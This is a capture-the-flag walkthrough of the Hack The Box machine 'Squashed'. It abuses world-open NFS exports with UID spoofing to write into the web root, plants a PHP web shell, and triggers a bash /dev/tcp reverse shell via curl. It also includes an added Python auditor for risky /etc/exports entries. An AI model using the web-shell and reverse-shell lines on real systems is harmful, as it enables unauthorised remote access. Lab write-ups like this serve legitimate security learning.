Squashed {HTB}

Gladi_47
Mar 7, 2023


SITE = HTB
Diff = Easy


##SCAN


PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48add5b83a9fbcbef7e8201ef6bfdeae (RSA)
| 256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)
|_ 256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Built Better
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 35822/udp6 mountd
| 100005 1,2,3 42139/udp mountd
| 100005 1,2,3 42885/tcp6 mountd
| 100005 1,2,3 59329/tcp mountd
| 100021 1,3,4 42171/tcp6 nlockmgr
| 100021 1,3,4 44021/tcp nlockmgr
| 100021 1,3,4 44753/udp6 nlockmgr
| 100021 1,3,4 46326/udp nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

##PORT 111

Port 111 is rpcbind, and the scan shows it advertising NFS (port 2049) and mountd.
We can list the exported directories and mount them on our machine.

$ showmount -e 10.10.11.191
Export list for 10.10.11.191:
/home/ross *
/var/www/html *

There are two exported directories. There is nothing in ross' directory except a KeePass database that we can't crack easily. Moving on!

$ sudo mount -t nfs 10.10.11.191:/var/www/html /mnt
mount.nfs: access denied by server while mounting 10.10.11.191:/var/www/html

$ ls -ld /mnt
drwxr-xr-- 5 **2017** www-data 4096 Mar 7 17:20 /mnt/

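So I created a new local user for this task and gave it UID 2017, the numeric owner shown above. NFS with AUTH_SYS trusts the UID the client sends, so the server treats this user as the owner of the directory.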

$ sudo useradd lol && sudo passwd lol && sudo usermod -u 2017 lol

Now we can access it BooM

drwxr-xr--  5 lol  http  4096 Mar  7 10:20 .
drwxr-xr-x 17 root root 4096 Feb 15 21:24 ..
drwxr-xr-x 2 lol http 4096 Mar 7 10:20 css
-rw-r--r-- 1 lol http 44 Oct 21 15:30 .htaccess
drwxr-xr-x 2 lol http 4096 Mar 7 10:20 images
-rw-r----- 1 lol http 32532 Mar 7 10:20 index.html
drwxr-xr-x 2 lol http 4096 Mar 7 10:20 js

We can WRITE in this directory

$ echo '<?php system($_REQUEST["cmd"]); ?>' > shell.php
$ curl 'http://10.10.11.191/shell.php' --data-urlencode 'cmd=bash -c "bash -i >& /dev/tcp/<IP>/<PORT> 0>&1"'
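
The access above works because both exports are open to any host (`*`) and the server trusts the UID supplied by the client. As an added example (not part of the original write-up), this Python check audits an `/etc/exports` file for those conditions in the common `path client(options)` form; the sample file and all export options in it are constructed, since the write-up only shows the `showmount` output.

```python
import re

# Constructed sample /etc/exports. The first two paths are the ones showmount
# listed in the write-up; their options are assumed, the rest is invented.
SAMPLE_EXPORTS = """\
/home/ross     *(rw,sync,root_squash)
/var/www/html  *(rw,sync,root_squash)
/srv/backup    10.0.0.5(ro,sync,all_squash)
/srv/scratch   *(ro,all_squash,anonuid=65534,anongid=65534)
/srv/build     10.0.0.0/24(rw,no_root_squash)   # trusted build subnet
"""

CLIENT_RE = re.compile(r"^([^()\s]*)(?:\(([^)]*)\))?$")

def audit_exports(text):
    """Return (path, client, issue) tuples for risky NFS export entries."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments
        if not line:
            continue
        path, *specs = line.split()
        for spec in specs:
            m = CLIENT_RE.match(spec)
            if spec.startswith("-") or not m:    # default-option blocks not handled
                continue
            client = m.group(1) or "*"           # "(rw)" with no host means every host
            opts = set(filter(None, (m.group(2) or "").split(",")))
            # exports(5) defaults: ro, root_squash, no_all_squash, sec=sys
            sec = next((o[4:] for o in opts if o.startswith("sec=")), "sys")
            world = client == "*"
            if world and "sys" in sec.split(":") and "all_squash" not in opts:
                # root_squash only remaps UID 0; any other UID is taken on trust
                findings.append((path, client, "uid-impersonation"))
            if world and "rw" in opts:
                findings.append((path, client, "world-writable"))
            if "no_root_squash" in opts:
                findings.append((path, client, "no-root-squash"))
    return findings

if __name__ == "__main__":
    for path, client, issue in audit_exports(SAMPLE_EXPORTS):
        print(f"{path:15} {client:12} {issue}")
```

Typical fixes for a flagged entry are naming the client hosts instead of `*`, adding `all_squash` or switching to `sec=krb5`, and exporting a web root read-only.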

##ALEX

alex@squashed:/home/alex$ ls -al
total 4700
drwxr-xr-x 19 alex alex 4096 Mar 7 04:59 .
drwxr-xr-x 4 root root 4096 Oct 21 14:57 ..
-rw-r--r-- 1 alex alex 57 Mar 5 23:30 .Xauthority
-rw-r--r-- 1 alex alex 57 Mar 5 23:30 .Xauthority.1
lrwxrwxrwx 1 root root 9 Oct 17 13:23 .bash_history -> /dev/null
drwxr-xr-x 8 alex alex 4096 Oct 21 14:57 .cache
drwx------ 8 alex alex 4096 Oct 21 14:57 .config
drwx------ 3 alex alex 4096 Mar 6 01:27 .gnupg
drwx------ 3 alex alex 4096 Oct 21 14:57 .local
drwxrwxrwx 2 alex alex 4096 Mar 6 01:48 .pkexec
drwx------ 2 alex alex 4096 Mar 7 04:59 .ssh
lrwxrwxrwx 1 root root 9 Oct 21 13:06 .viminfo -> /dev/null
-rw-rw-rw- 1 alex alex 34180 Mar 6 01:53 CVE-2022-2586.c
drwxr-xr-x 2 alex alex 4096 Oct 21 14:57 Desktop
drwxr-xr-x 2 alex alex 4096 Oct 21 14:57 Documents
drwxr-xr-x 2 alex alex 4096 Oct 21 14:57 Downloads
drwxrwxrwx 2 alex alex 4096 Mar 6 01:48 GCONV_PATH=.
drwxr-xr-x 2 alex alex 4096 Oct 21 14:57 Music
drwxr-xr-x 2 alex alex 4096 Oct 21 14:57 Pictures
drwxr-xr-x 2 alex alex 4096 Oct 21 14:57 Public
drwxrwxrwx 4 alex alex 4096 Mar 6 02:08 PwnKit
drwxr-xr-x 2 alex alex 4096 Oct 21 14:57 Templates
drwxr-xr-x 2 alex alex 4096 Oct 21 14:57 Videos
-rw-rw-rw- 1 alex alex 2299 Mar 6 02:02 index.html
-rwxrwxrwx 1 alex alex 828078 Jan 1 04:26 linpeas.sh
-rw-r--r-- 1 alex alex 1923179 Mar 7 04:47 sc.xwd
-rw-r--r-- 1 alex alex 1923179 Mar 6 10:37 screenshot.xwd
drwx------ 3 alex alex 4096 Oct 21 14:57 snap
-rw-r----- 1 root alex 33 Mar 5 23:31 user.txt

I moved the screenshot file to the webserver and downloaded it

alex@squashed:/home/alex$ su 
su
Password: <BOOOOOOOO!!!!!!>

THANKS for reading

Take Care Happy Hacking!! 👏
